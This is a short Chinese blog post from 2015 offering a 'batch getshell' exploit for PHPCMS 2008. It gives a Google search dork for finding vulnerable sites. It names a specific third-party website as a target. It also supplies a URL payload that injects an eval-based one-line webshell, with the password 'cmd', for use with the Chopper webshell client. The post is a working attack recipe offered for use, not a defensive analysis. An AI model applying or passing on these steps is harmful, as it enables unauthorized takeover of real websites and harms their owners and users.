phpcms2008代码执行批量getshell EXP

使用方法：

谷歌批量搜索

关键字：inurl:yp/product.php

exp代码： product.php?}}

找取一个网站：www.slsdgc.com.cn/yp/product.php?catid=721

exp利用方法：www.slsdgc.com.cn/yp/product.php?}}

直接放入菜刀：

地址输： http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}} 密码 cmd

默认级别 php gb2312

posted @ 2015-09-25 16:34 小生观察室阅读(85) 评论(0) 编辑收藏举报

刷新页面返回顶部

小生观察室